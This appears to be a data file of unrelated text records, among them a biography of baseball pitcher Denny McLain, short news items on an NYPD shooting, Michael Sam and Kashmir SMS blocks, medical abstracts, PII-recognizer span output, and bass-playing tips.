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[ "Denny McLain\n\nDennis Dale McLain (born March 29, 1944) is an American former professional baseball player. ", "He was a pitcher in Major League Baseball for ten seasons, most notably for the Detroit Tigers. ", "In 1968, McLain became the most recent Major League Baseball pitcher to win 30 or more games during a season (with a record of 31–6) — a feat accomplished by only 11 players in the 20th century.", "\n\nAs a player, McLain was brash and outspoken, sometimes creating controversy by criticizing teammates and fans with little provocation. ", "His stellar performance at the beginning of his major league career included two Cy Young awards and an American League MVP award. ", "His success in baseball stood in marked contrast to his personal life, where he associated with organized crime and was eventually convicted on charges of embezzlement, after which he served time in prison.", "\n\nProfessional playing career\n\nThe rise to stardom\nMcLain was born in Markham, Illinois, and attended Mt. Carmel High School in Chicago, where he played on the baseball team as a shortstop and pitcher. ", "As a teenager he met his future wife, Sharyn Boudreau, the daughter of former major league player Lou Boudreau. ", "McLain was also musically talented, learning to play the organ from his father.", "\n\nUpon his graduation from high school in June 1962, McLain was signed by the Chicago White Sox as an amateur free agent, and was assigned to play with the Harlan Smokies of the Appalachian League. ", "McLain had a spectacular performance in his minor league professional baseball debut, throwing a no-hitter and striking out 16 batters in a game against the Salem Rebels on June 28. ", "After just two games with the Smokies, he was promoted to the Clinton C-Sox of the Midwest League, where he posted a record of four wins and seven losses.", "\n\nAt the time, players with one year of service in the minor leagues were subject to a draft if they were not called up to the major leagues. ", "The White Sox left McLain in the minor leagues, and he was selected off waivers by the Detroit Tigers on April 8, 1963. ", "He progressed swiftly through the Tigers' minor league system, jumping from Class A Duluth-Superior to Class AA Knoxville during the summer. ", "The Tigers saw enough promise that they decided to advance him all the way from Class AA to the majors, and he made his major league debut on September 21, 1963 at the age of 19. ", "His debut against the Chicago White Sox was almost as impressive as his minor-league debut, holding the White Sox to one earned run on seven hits. ", "He also picked off two baserunners and hit a home run, which was the only home run of his major-league career. ", "McLain is one of only six teenaged pitchers to hit a major-league home run since 1920, a list that includes Hall-of-Famers Don Drysdale and Jim Palmer.", "\n\nMcLain began the 1964 season with the Syracuse Chiefs of the International League, but was called back to the major leagues in early June and ended the season with a won-loss record of 4-5. ", "He then played for the Mayagüez Indians in the Puerto Rico Baseball League, where he posted a 13-2 record and helped the Indians win the league championship. ", "He was called back to the majors in 1965 and continued to pitch well for the Tigers. ", "On June 15, McLain set a major-league record for relief pitchers, when he struck out the first seven batters he faced after entering the game in the first inning to relieve starting pitcher Dave Wickersham. ", "He ended the season with a 16-6 record, a 2.61 earned run average, and 192 strikeouts, the third-highest strikeout total in the American League behind Sam McDowell and teammate Mickey Lolich. ", "Although he had a curveball and a changeup, he relied mostly on his fastball to get batters out.", "\n\nIn 1966, McLain had a 13–4 mid-season record and earned the role of American League starting pitcher in the 1966 All-Star Game, where he threw just 28 pitches to retire all nine batters that he faced. ", "He finished the season with a 20–14 record with a 3.92 earned run average.", "\n\nIn 1967, the Tigers hired former major-league pitcher Johnny Sain as their pitching coach. ", "Sain helped develop McLain's pitching skills and taught him the psychology of pitching. ", "The 1967 season was memorable due to the tight four-way pennant race between the Tigers, the Boston Red Sox, the Minnesota Twins, and the Chicago White Sox. ", "McLain finished with a 17–16 record and a 3.79 earned run average but was winless after August 29. ", "On September 18, McLain reported that he had severely injured two toes on his left foot, saying that he had stubbed them after his foot had fallen asleep. ", "Going into the final game of the season against the California Angels, the Tigers needed a victory to force a one-game playoff with the Red Sox for the American League pennant. ", "McLain pitched ineffectively in the final game and the Tigers lost to finish the season one game behind the Red Sox.", "\n\nThe year of the pitcher\nTen games into the 1968 season, the Tigers were in first place, having won nine consecutive games after losing the opener. ", "McLain made controversial statements in early May by criticizing Detroit fans for being \"the biggest front-running fans in the world.\" ", "He continued to win games at a remarkable pace, registering his 29th victory on September 10. ", "On September 13, he appeared on the cover of Time. ", "On September 14 at Tiger Stadium, McLain pitched the Tigers to a 5–4 victory over the Oakland Athletics in front of a nationally televised audience to become Major League Baseball's first 30-game winner since 1934. ", "Dizzy Dean, the previous 30-game winner, was on hand to congratulate him.", "\n\nAfter the Tigers had clinched the 1968 American League pennant, McLain added to his penchant for notoriety while pitching his 31st and final regular season victory in a game against the Yankees on September 19. ", "McLain had grown up idolizing New York Yankee center fielder Mickey Mantle, who entered the game tied with Jimmie Foxx for third place in the major-league career home runs list. ", "When Mantle—who was nine days away from his last major league appearance—came to bat in the eighth inning with the Tigers leading 6–1, McLain intentionally threw a soft pitch directly over home plate. ", "Other accounts said that he called catcher Jim Price to the mound and had him tell Mantle that he would be throwing only fastballs. ", "Mantle hit the pitch for his 535th career home run, putting him in sole possession of third place on the all-time home run list, behind only Babe Ruth and Willie Mays. ", "As Mantle ran around the bases, McLain stood on the pitcher's mound and applauded. ", "Mantle tipped his hat to McLain as he rounded the bases. ", "The next batter, Joe Pepitone, waved his bat over the plate, as if asking for an easy pitch of his own. ", "McLain responded by throwing the next pitch over Pepitone's head. ", "After the game, McLain smilingly denied that he had served up an easy pitch for Mantle to hit; however, he was later reprimanded by Major League Baseball Commissioner William Eckert.", "\n\nMcLain completed a 31–6 record along with a 1.96 earned run average, as the Tigers led from start to finish to win the American League pennant by 12 games. ", "He had 280 strikeouts and 63 walks, giving him a 4.44 K:BB ratio, a Tigers season record that stood until 2016, when it was eclipsed by Justin Verlander. ", "McLain also earned his second All-Star berth and won the 1968 American League Cy Young Award, as well as the American League Most Valuable Player Award, the first by an American League pitcher since Bobby Shantz in 1952 and the first by a Tiger since fellow pitcher Hal Newhouser's back-to-back honors in 1944 and 1945. ", "He was the first pitcher in American League history to win the Most Valuable Player Award and the Cy Young Award in the same season. ", "St. Louis Cardinal Bob Gibson won the National League's Most Valuable Player Award that same year, making 1968 the only season to date in which a pitcher won the MVP Award in both leagues.", "\n\nMcLain's performance in the Tigers' 1968 World Series triumph over the Cardinals was not as impressive as his regular season. ", "Having already pitched 336 innings and 28 complete games during the regular season, a sore-armed McLain lost twice to Gibson (including a still-standing World Series record 17-strikeout performance in the opener) to help put the Tigers down three games to one. ", "Trailing three games to two, McLain won the crucial Game 6 on just two days' rest, aided by a grand slam home run from Jim Northrup. ", "Teammate Mickey Lolich won three games during the series, including a complete-game triumph in Game 7 against Gibson, and won the World Series MVP award. ", "After the season, when McLain was asked about Lolich's performance in the World Series, he responded controversially by saying: \"I wouldn't trade one Bob Gibson for 12 Mickey Loliches.\"", "\n\nThe season became known as the \"Year of the Pitcher\", with batting averages and run production dropping in both leagues. ", "After the record home-run year by Roger Maris in 1961, the major leagues increased the size of the strike zone from the top of the batter's shoulders to the bottom of the knees. ", "Pitchers such as McLain and Gibson among others dominated hitters, producing 339 shutouts in 1968. ", "Carl Yastrzemski was the only American League hitter to finish the season with a batting average higher than .300. ", "In the National League, Gibson posted a 1.12 earned run average, the lowest in 54 years, while Los Angeles Dodgers pitcher Don Drysdale threw a record consecutive scoreless innings during the 1968 season. ", "As a result of the dropping offensive statistics, Major League Baseball took steps to reduce the advantage held by pitchers by lowering the height of the pitcher's mound from 15 inches to 10, and by reducing the size of the strike zone for the 1969 season.", "\n\nThe high life\nMcLain's success on the playing field led to endorsement opportunities from the Hammond Organ Company; he also made musical appearances in Las Vegas. ", "He was invited to appear with his musical quartet on The Ed Sullivan Show along with his World Series opponent (and guitarist) Bob Gibson. ", "McLain also made appearances on The Steve Allen Show and The Joey Bishop Show. ", "He also released two albums on Capitol Records, Denny McLain at the Organ (1968) and Denny McLain in Las Vegas (1969).", "\n\nIn January 1969, McLain was selected as the Associated Press Male Athlete of the Year. ", "He created more disruption when he was named as the starting pitcher for the American League in the 1969 All-Star Game in Washington, D.C., but missed the start of the game because of a dental appointment in Detroit. ", "The appointment was scheduled for Wednesday the 23rd, the day after the All-Star game, but because of a rainout on the scheduled date, the game was played on the 23rd. ", "\n\nMcLain was a nonconformist and liked to play by his own rules. ", "He had learned to fly and purchased an airplane. ", "Having kept his dental appointment, he then flew himself to Washington, arriving at the game during the second inning. ", "He pitched in the fourth inning, but by then the National League had already built a 9–2 lead. ", "\n\nMcLain created more dissension when he clashed with Tigers' manager Mayo Smith over the latter's role in the firing of Johnny Sain as the team's pitching coach. ", "Despite the troubles, McLain had another productive season in 1969, winning 24 games and a second consecutive Cy Young Award, tying with Baltimore's Mike Cuellar, marking the first time two players had shared the award. ", "It was the last award of his major league career.", "\n\nThe downfall\nIn February 1970, Sports Illustrated and Penthouse both published articles about McLain's involvement in bookmaking activities. ", "Sports Illustrated cited sources who alleged that the foot injury suffered by McLain late in 1967 was caused by an organized crime figure who stomped on McLain's foot as punishment for failing to pay off on a lost bet. ", "Early in his career, McLain's interest in betting on horses was piqued by Chuck Dressen, one of his first managers. ", "McLain's descent into his gambling obsession was further precipitated by an offhand remark made during an interview: that he drank about a case of Pepsi a day. (", "When he pitched, he was known to drink a Pepsi between innings.) ", "A representative from Pepsi then offered McLain a contract with the company, just for doing a few endorsements. ", "McLain soon realized that he and the Pepsi representative shared an affinity for gambling; when the two realized how much money they were losing, and that they could earn so much more by \"taking the action\" on bets, they attempted to set up a bookmaking operation as hands-off, silent partners.", "\n\nMcLain was suspended indefinitely by baseball commissioner Bowie Kuhn; the suspension was then set for the first three months of the 1970 season. ", "He returned in mid-season, but struggled to pitch well. ", "McLain then received a seven-day suspension (from the Detroit club) in September for dousing sportswriters Jim Hawkins of the Detroit Free Press and Watson Spoelstra of the Detroit News with buckets of water. ", "Just as the seven-day suspension was about to end, he received another suspension from Kuhn, this time for carrying a gun on a team flight; the punishment would last for at least the rest of the season. ", "McLain's 1970 season ended with a won-loss record of only 3–5. ", "Later that year, he was forced into bankruptcy despite being the first $100,000 player in Tigers history. ", "Meanwhile, McLain and his friend Jim Northrup co-schemed to make more money; they were back in Detroit furthering a plan that they shared to generate a nude baseball model calendar. ", "These efforts eventually fell short.", "\n\nOn October 9, 1970, McLain was traded by the Detroit Tigers with Elliott Maddox, Norm McRae, and Don Wert to the Washington Senators for Joe Coleman, Eddie Brinkman, Jim Hannan, and Aurelio Rodríguez. ", "Kuhn actually had to clear the trade because McLain was still under suspension, and suspended players cannot be traded without the commissioner's permission. ", "Kuhn later wrote in his autobiography, Hardball: The Education of a Baseball Commissioner, that he was shocked at what he called a \"foolish gamble\" by the Senators, and predicted that the trade would turn out to be a Tiger heist.", "\n\nThe McLain trade was made over the strenuous objections of Senators manager Ted Williams, who had little patience for McLain's high living. ", "The feeling was mutual; early in the 1971 season, he became a charter member of the \"Underminers' Club\", a group of five players dedicated to getting Williams fired. ", "They spent much of the season feuding over Williams' use of a then-unusual five-man rotation for his starters. ", "Senators broadcaster Shelby Whitfield later told Rob Neyer that when Williams yanked McLain early from a July 5 game against the Cleveland Indians, McLain threatened to call Senators owner Bob Short and have him get rid of Williams.", "\n\nBy this time, McLain had serious arm trouble, inadvertently made worse by numerous cortisone shots he took for his sore arm. ", "As a result, he essentially stopped throwing fastballs midway through the 1971 season. ", "Due to his arm troubles and his inability to get along with Williams, McLain went 10–22. ", "He thus earned the dubious distinction of going from leading his league in wins (tied with Mike Cuellar with 24 wins in 1969) to two years later leading his league in losses. ", "McLain's 22 defeats (a mark later tied by three pitchers, all in 1974) remains the most in a major-league season since Jack Fisher of the Mets lost 24 in 1965.", "\n\nAfter the 1971 season, McLain was traded to the Oakland Athletics for journeyman pitcher Jim Panther and prospect Don Stanhouse (who went on to have a few good years as the Baltimore Orioles' closer in the late 1970s). ", "After only five starts, one win, and a 6.04 ERA, the Athletics traded him to the Atlanta Braves for Orlando Cepeda; he went only 3–5 for Atlanta, and his overall totals for 1972 were 4–7 with a 6.37 ERA. ", "His final major league appearance came on September 12 against the Cincinnati Reds; he came into a tied game in the ninth and promptly gave up three runs without retiring a batter, taking the loss (coincidentally, the last batter McLain ever faced in the major leagues was Pete Rose, who also was involved in a gambling scandal years later). ", "The Braves released McLain during spring training, on March 26, 1973. ", "After short stints with minor-league clubs in Des Moines and Shreveport, McLain retired. ", "At the age of 29, he was out of baseball.", "\n\nCareer statistics\nIn a 10-year major-league career, McLain won 131 games against 91 losses. ", "His career earned run average was 3.39 and he recorded 1,282 strikeouts in 1,886 innings pitched. ", "McLain was a three-time All-Star and won the Cy Young Award twice in his career. ", "Because he relied so much on his fastball, he also surrendered numerous home runs, leading the American League in home runs allowed in three consecutive years (1966–1968).", "\n\nSince McLain's 31-win season, only two other pitchers have approached the 30-game milestone (Steve Carlton won 27 games in 1972 and Bob Welch also with 27 victories in 1990). ", "With Major League Baseball moving from the four-man pitching rotation of McLain's era to five-man rotations, and with the increased reliance on relief pitchers, some observers believe that another 30-game winner may not occur because of the way the game is played today.", "\n\nPost-major league career\n\nIn 1974, McLain played a season for the London Majors of the Intercounty Baseball League at Labatt Memorial Park in London, Ontario, Canada. ", "Because of his arm problems, McLain pitched only nine innings for the Majors, but played in 14 games at shortstop, first base, or catcher, and batted .380, including hitting two homers in one game in London.", "\n\nMcLain continued to earn side money playing the organ at clubs, including a club in suburban Detroit where former heavyweight boxing champion Leon Spinks worked as a bartender. ", "McLain also earned quite a bit of money hustling golf, easily attracting 'marks' due to his past baseball fame. ", "Additionally, he reportedly once accepted over $160,000 to fly a wanted felon out of the country.", "\n\nMcLain's weight ballooned to during his post-baseball career. ", "He was imprisoned for drug trafficking (cocaine), embezzlement, and racketeering. ", "Lawrence R. Greene—John Gotti Jr.'s later attorney—represented McLain before the United States Court of Appeals for the Eleventh Circuit in Atlanta. ", "His conviction was reversed under the Racketeer Influenced and Corrupt Organizations Act in the United States District Court for the Middle District of Florida in Tampa.", "\n\nBetween his stints in prison and rehabilitation in the mid-1980s to the early-1990s, McLain could be found on various talk radio sports shows and occasionally on panel-format sports shows on network television in the Detroit area; he also modeled Hanes underwear. ", "He could also be found signing autographs at a metro Detroit 7-Eleven store at the corner of Mound Road and Metro Parkway in Sterling Heights, Michigan, where he was employed on work-release. ", "After his release, he also hosted a popular daily talk radio show for a few years on Detroit talk station WXYT.", "\n\nMcLain's oldest daughter, Kristin, 26, was killed on March 20, 1992, in a drunk driving accident. ", "She had been living in Florida and was moving back home to Michigan when she was killed just a few miles from her parents' home. ", "In part to escape his grief, McLain and several partners bought the Peet Packing Company (Farmer Peet's) located in the small town of Chesaning, Michigan in 1994. ", "McLain was also a partner in the Michigan Radio Network. ", "Both companies went bankrupt two years later. ", "In 1996, he was convicted on charges of embezzlement, mail fraud, and conspiracy in connection with the theft of $2.5 million from the Peet employees' pension fund. ", "McLain spent six years in prison; to this day, he insists he knew nothing about the shady financial deals alleged by the government. ", "McLain claims he paid restitution for this incident.", "\n\nDuring the Detroit Tigers 2006 playoff run, McLain was the baseball analyst for Drew and Mike on WRIF radio in Detroit. ", "In 2007, McLain released his autobiography I Told You I Wasn't Perfect, co-authored by longtime Detroit sportscaster and author Eli Zaret. ", "Prior to that, McLain and Zaret hosted a sports television show together in Detroit.", "\n\nMcLain currently resides in Pinckney, Michigan, with his wife, Sharyn. ", "Sharyn had divorced Denny during his most recent incarceration but remarried him upon his release. ", "McLain writes a monthly editorial column and blogs regularly for In Play! ", "Magazine, a Detroit sports magazine.", "\n\nKevin Costner's character in the motion picture The Upside of Anger was partly based on McLain (and also partly on Kirk Gibson, another Tiger of World Series note).", "\n\nOn April 11, 2008, McLain was arrested without incident after deputies discovered an outstanding warrant against him for failing to appear for a January 16 court hearing.", "\n\nOn September 22, 2011, McLain was arrested in Port Huron, Michigan, at the Canada–US border after officials discovered an outstanding warrant against him from St. Charles Parish, Louisiana. ", "Because of construction detours, McLain had inadvertently taken an exit off I-94 sending him directly across the Bluewater Bridge and into Canada. ", "He immediately returned to the U.S., where he was obligated to go through a U.S. Customs and Border Protection inspection booth. ", "The outstanding warrant was then discovered, for which McLain was jailed in Port Huron, Michigan. ", "In less than a week, the warrant was cleared and McLain was released.", "\n\nFrom 2017 to 2018, McLain hosted a Sunday radio show about life and politics on WFDF (AM).", "\n\nIn January 2019 McLain and former local sportscasters Eli Zaret and Bob Page launched a podcast called \"No Filter Sports.\"", "\n\nSee also\n\n 1968 Detroit Tigers season\n 1968 World Series\n 1968 in baseball\n Associated Press Athlete of the Year\n List of Major League Baseball annual wins leaders\n List of Detroit Tigers team records\n\nNotes\n\nReferences\n Nobody's Perfect by Denny McLain with Dave Diles (The Dial Press, New York, 1975).", "\n Strikeout: The Story of Denny McLain by Denny McLain and Mike Nahrstedt (Sporting News, 1988).", "\n I Told You I Wasn't Perfect by Denny McLain and Eli Zaret (Triumph Books, 2007).", "\n Thirty-one and six: The story of Denny McLain by Robert B. Jackson (H. Z. Walck, 1969).", "\n\nExternal links\n, or Retrosheet\nThe Baseball Biography Project: Denny McLain\n ESPN Classic: From the big time to the big house\n The downfall of former pitcher Denny McLain\n Denny McLain's Tigers Report\n\nCategory:1944 births\nCategory:Living people\nCategory:American drug traffickers\nCategory:American extortionists\nCategory:American fraudsters\nCategory:American League All-Stars\nCategory:American League Most Valuable Player Award winners\nCategory:American League wins champions\nCategory:American people convicted of fraud\nCategory:American people of Irish descent\nCategory:Atlanta Braves players\nCategory:Baseball players from Illinois\nCategory:Birmingham A's players\nCategory:Capitol Records artists\nCategory:Clinton C-Sox players\nCategory:Cy Young Award winners\nCategory:Detroit Tigers players\nCategory:Duluth-Superior Dukes players\nCategory:Harlan Smokies players\nCategory:Indios de Mayagüez players\nCategory:Iowa Oaks players\nCategory:Knoxville Smokies players\nCategory:London Majors players\nCategory:Major League Baseball pitchers\nCategory:Oakland Athletics players\nCategory:People from Markham, Illinois\nCategory:Shreveport Captains players\nCategory:Sportspeople from Chicago\nCategory:Syracuse Chiefs players\nCategory:Washington Senators (1961–1971) players\nCategory:American sportspeople convicted of crimes" ]
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[ "Advertisement NYPD: Hatchet-wielding suspect shot by officers Bystander wounded in shooting Share Shares Copy Link Copy\n\nA hatchet-wielding man attacked a group of patrol officers in a busy commercial district in Queens on Thursday, injuring two before the other officers shot and killed him, New York City police said.", "A bystander was wounded in the gunfire.", "At a news conference at a hospital where one officer was being treated for a serious head wound, Police Commissioner William Bratton said that investigators were still trying to confirm the identity of the assailant and determine a motive.", "Asked if the attack could be related to terrorism, Bratton didn't rule it out. ", "He cited the fatal shooting of a solider in Canada earlier this week - what officials there have called a terror attack - as reason for concern.", "\"This early on, we really cannot say yes or no to that question,\" Bratton said.", "The attack occurred in the commercial district in Queens at about 2 p.m., while four rookie New York Police Department officers on foot patrol were posing for a photo, police said. ", "Without a word, the man charged the officers and began swinging the hatchet, first hitting one in the arm and another in the back of the head, they said.", "After the second officer fell to the ground, the two uninjured officers fired several rounds. ", "The bullets killed the assailant and wounded the bystander, police said.", "The officer was in critical but stable condition and was expected to undergo surgery. ", "The woman who was struck by a stray bullet also was hospitalized with a gunshot wound to the back." ]
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[ "Michael Sam, who became the first openly gay football player to be drafted by an NFL team, has made waves in just three preseason games. ", "But on a surprisingly deep St. Louis roster, Sam's spot is hardly guaranteed.", "\n\nFor those who are fans of the Missouri standout, as Tyson Langland points out, there has been a lot to celebrate:\n\nHeading into the preseason finale, Sam has tallied three quarterback sacks, four quarterback hits and five combined tackles. ", "Even though those numbers have come against second- and third-string offensive linemen, they are impressive nonetheless.", "\n\nOn Saturday, Sam not only had two sacks against the Cleveland Browns much ballyhooed first-round pick Johnny Manziel, but Sam also suavely incorporated Johnny Football's \"money\" sign into his celebration.", "\n\nThe most meaningful thing to happen in a meaningless preseason. ", "Michael Sam sacks Johnny Manziel. ", "https://t.co/eiGiCE2Ok0 — Zeddonymous (@ZeddRebel) August 24, 2014\n\nBut as NFL teams prepare to make major roster cuts as the season draws nigh, the scope of Sam's history-making may be limited for now. ", "As the Daily News reports, the Rams happen to have a surplus of talent at Sam's position:\n\n“He’s no different than any other late-round pick or college free agent that we have. ", "He’s just trying to make this team,” Rams coach Jeff Fisher said in his office the other day. “", "We have a reality that we can only keep so many players at that position. ", "Is he better than that fourth or fifth defensive end? ", "Right now, I can’t answer that.”", "\n\nWith teams cutting their rosters from 90 players to 75 on Tuesday and selecting their final 53 players this weekend, Sam has tried to present himself not only as a defensive presence, but also a factotum of sorts. ", "In addition to defensive line, Sam has played a few kickoffs for the Rams special teams squad, a rarity for a defensive end.", "\n\nStory continues\n\nRELATED: ‘The Leftovers’ Wisely Flashes Back to Reel Us in Going Forward\n\nWhile Sam is quite naturally a sentimental favorite for many, it would undermine the meaning of his barrier-breaking were he to be chosen for the team because of his biography rather than regardless of it. ", "Nevertheless, should Sam not ultimately make the roster, it does seems likely that he will find a place on a practice squad somewhere.", "\n\nThis article was originally published at http://www.thewire.com/entertainment/2014/08/first-openly-gay-nfl-draftee-michael-sam-may-not-make-the-team/379060/\n\nRead more from The Wire\n\n• John Oliver Destroyed the Internet's Tendency Towards Hyperbole, Plus a Piñata" ]
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[ "Tubal sterilization and risk of ovarian, endometrial and cervical cancer. ", "A Danish population-based follow-up study of more than 65 000 sterilized women.", "\nOn the basis of a population-based cohort, we assessed the cancer risk, focusing on gynaecological cancers and pre-malignant lesions, among women with a previous tubal sterilization. ", "Using the Danish Hospital Discharge Register we identified 65 232 women who had a tubal sterilization (1977-1993). ", "The cohort was followed for cancer occurrence, and compared with the expected number based on the national cancer incidence rates. ", "The overall risk of ovarian cancer was decreased (standardized incidence ratio [SIR] = 0.82; 95% CI: 0.6, 1.0), and it was still decreased > or =10 years after the sterilization (SIR = 0.65; 95% CI: 0.4, 1.0). ", "The rate of endometrial cancer was also decreased (SIR = 0.66; 95% CI: 0.5, 1.0), the risk continued being moderately reduced during follow-up, although it was not statistically significant. ", "In this nationwide, population-based study we find that women with tubal sterilization have a decreased risk of subsequent development of ovarian cancer. ", "As the protective effect is not decreasing with years of follow-up, our data do not support that 'screening' bias can explain the protective effect, but indicate that the sterilization itself may convey a reduction in risk. ", "The same pattern is found for endometrial cancer, the association being less strong." ]
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[ { "analysis_explanation": null, "end": 5, "entity_type": "NRP", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 0 }, { "analysis_explanation": null, "end": 82, "entity_type": "NRP", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 76 }, { "analysis_explanation": null, "end": 449, "entity_type": "DATE_TIME", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 440 }, { "analysis_explanation": null, "end": 736, "entity_type": "DATE_TIME", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 728 }, { "analysis_explanation": null, "end": 1191, "entity_type": "DATE_TIME", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 1186 } ]
[ "[A Rare Case of Ruptured/Unruptured Miniature Aneurysms Originating from the Infundibular Dilatation of the Callosomarginal Artery, Branching from the Infracallosal(A2)Segment of the Azygos Anterior Cerebral Artery].", "\nWe report the first case of two de novo miniature aneurysms(ruptured/unruptured)emerging from the infundibular dilatation(ID)of the callosomarginal artery, which branches from the infracallosal(A2)segment of the azygos anterior cerebral artery(AACA), in a 36-year-old woman. ", "The patient had previously been diagnosed with a miniature, unruptured aneurysm, occurring in the A2 segment of the AACA, detected by CT angiography(CTA)at another hospital two years ago, and had been followed up with MR angiography(MRA)every 6 months. ", "Three months after the final check-up with MRA, which did not indicate a significant change in the aneurysm, the patient presented with subarachnoid hemorrhage. ", "Subsequent CTA and digital subtraction angiograms revealed that the right callosomarginal artery, originating from the apex of the aneurysmal bulge, had a maximal diameter of 3mm, indicating an ID of the artery. ", "Additionally, two miniature bleb-like aneurysms emerged from the ID, projecting in opposite directions:one projecting to the right-posterior/superior direction and the other to the left-anterior/inferior direction. ", "Both aneurysms were successfully clipped via a right pterional approach with partial resection of the gyrus rectus, and the right-projecting aneurysm was confirmed to be ruptured during surgery. ", "In the current report, we review previously reported cases of AACA with aneurysms, and discuss their clinical characteristics, and the possible mechanisms underlying the formation of the ID and de novo aneurysms in this extremely rare case." ]
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[ "[The effect of insulin on the function of the lysosomal apparatus of the neutrophilic leukocytes during the formation of a stress syndrome].", "\nIn experiments on male rabbits with the lack of insulin it is been revealed violations after the past immobilization the intensivity and duration of neutrophilic leukocytosis decrease, contents of lysosomes in neutrophils, activity of acid phosphatase. ", "By lysosomal ferments don't determine the can observer discordance of processes of coagulation, fibrinolysis, kininogenesis." ]
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[ "All SMS services blocked in Kashmir, Valley still tense\n\nAll SMS services in Kashmir have been blocked, media reports said Tuesday.", "\n\nAccording to PTI, the step has been taken by the government keeping in mind the deteriorating law and order situation in the Valley.", "On Monday, two people, Tajamul Bashir (17) and Ashif Hassan Rather (9) died in CRPF firing in Sopore and Baramulla, both 55 km north of Srinagar. ", "This brings the number of civilian deaths at the hands of troops to eight in 15 days, three of them in the past 48 hours.", "\n\nKashmir has recently seen a spurt of violence, as a result of which paramilitary forces have been compelled to use force against people partaking in anti-State activities.", "Earlier in April, the Jammu and Kashmir government had banned SMS services across the state for post paid subscribers in the wake of national security issues but was later revoked." ]
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[ "Believe it or not, becoming a better bass player is something that can happen fairly quickly. ", "All it takes is a simple shift in your mindset and practice routine and you’ll be on the right track. ", "Once you know the right things to focus on it will change the way you listen to music, play your bass, and interact with other musicians. ", "Take a look at my top 8 tips below and find out what makes a good bassist. ", "1. ", "Listen To A Variety Of Music Styles As listed in our article on common mistakes that bass players make, listening to music is the single most important thing you can do as a musician, and exposing yourself to a variety of styles is equally as important. ", "When listening to other genres you’ll quickly pick up on new time signatures, rhythms, sounds, and techniques that you’d otherwise never be aware of. ", "These can quickly find their way into any kind of music you play, and it will help you expand your musical vocabulary so you aren’t just playing the same things over and over. ", "The bassist who listens to funk, jazz, metal, folk, and country is going to have a huge advantage over the bassist who strictly listens to metal. ", "It might take a little bit of effort in the beginning, but once you discover a few songs you like in a new genre you’ll begin to have a better understanding of what “good” music is and how the bass guitar supports each style. ", "Having this extra knowledge will help inspire you when it comes to writing new music and it will aid you immensely when improvising since you’ll have a greater library to pull from in your brain. ", "As an added bonus, listening to good music has been proven to release a mood-enhancing chemical (dopamine) in your brain. ", "2. ", "Know Your Major Scales Inside And Out We’ve all heard it a million times - “Know your major scales!” ", "The major scale is the first scale you should learn on bass and for good reason. ", "Just about every single scale, chord, and piece of music theory you’ll ever learn is constructed from the major scale in one way or another. ", "Think of learning the major scale as “unlocking the fretboard”. ", "You’ll begin to see the bass guitar in a new light and see how all the notes and shapes interact with one another which is essential for truly becoming comfortable with your instrument. ", "3. ", "Play With Other Musicians Playing along with jam tracks or a metronome can be great for practicing your skills, but playing with other musicians is where the true learning takes place. ", "It’s the unpredictability and spontaneity of playing with others that truly makes your brain spin, and it’s what forces you to glue together all that you’ve ever learned into one moment to make great music.", "\n\nIf you don’t have anybody to play with, try going to a local jam session in your city. ", "There will be plenty of people there just like you who want the opportunity to jam with other musicians. ", "Who knows, you might meet some new friends who you can jam with on a regular basis. ", "Learn some standards before you go however so you aren’t unprepared! ", "4. ", "Lock In With The Drummer Besides keeping solid time, one of the major functions of the bass player is to lock in with the drummer. ", "This does not mean that you need to play a bass note only when the drummer hits their bass drum. ", "If this were the case you’d be a slave to the drummer, not have any creative freedom, and the result would be a boring tune. ", "Locking in with the drummer means being on the same page, but still with each having their own timing, syncopation, and intonation. ", "There should be moments where the bass drum and bass guitar are locked in unison, and there should also be times when one allows the other to breathe or stand out. ", "This creates tension and release which is an essential part of any song.", "\n\nYou can think of it like a discussion. ", "You need to talk (by playing) and listen to each other to maintain the same tempo and agree on where the downbeat is for the rest of the band. ", "Great bassists will listen to and accentuate the drum beat, and great drummers will listen to and accentuate the bass groove. ", "5. ", "Get A Teacher By far the fastest way to get better at playing bass guitar is through a teacher. ", "While there are some great online bass lessons out there, it’s really hard to figure out what to focus on let alone how to correct your technique mistakes. ", "With a teacher you get individual attention, custom exercises tailored to your specific needs, and the eyes of an experienced bassist to correct any posture or technique pitfalls that you might have. ", "Being able to sit down 1-on-1 with someone who has been through it all and have them create a custom lesson plan for YOU is completely worth it no matter what your skill level may be. ", "6. ", "Ear Training Ear training is the ability of a musician to identify certain musical elements such as notes or intervals while reading, listening to, or thinking about music. ", "It’s what will allow you to hear something, whether in your head or on the radio, and then instantly play it without having to look up tabs. ", "It’s a great skill to have and an essential one for improvising. ", "Many great bassists picked up improvising by hearing a tune while watching TV and then trying to play it on bass. ", "This constant trial and error is what allows you to identify intervals and scale degrees accurately and each time you try it you get better. ", "The next time you hear a catchy melody somewhere, try to visualize the bass guitar in your hands and imagine playing it. ", "Think of how far apart each note is and where it is on the fretboard. ", "Later that day, grab your bass and try it out. ", "See how close you were and then figure out how to play the actual melody. ", "You’ll soon recognize those intervals much easier than before if you keep at it. ", "Ear training is something you can practice without a bass guitar so there really is no excuse! ", "7. ", "Work On Your Picking Hand If your fretting hand is what guides you on your journey, then your picking hand is the engine. ", "Want to know how to get better at playing bass? ", "Work on your right hand. ", "It really is one of the best bass guitar tips. ", "Far too many bassists ignore the technique in their picking hand and focus solely on being able to play fast with their left hand. ", "The truth of the matter is that you’ll only be able to go as fast as your right hand can take you. ", "Proper alternating finger technique is an absolute must if you want to play fast licks, and if you are playing with a pick you’ll want to nail down things like alternate picking and string skipping. ", "Here is a great lesson on practicing with your right hand:" ]
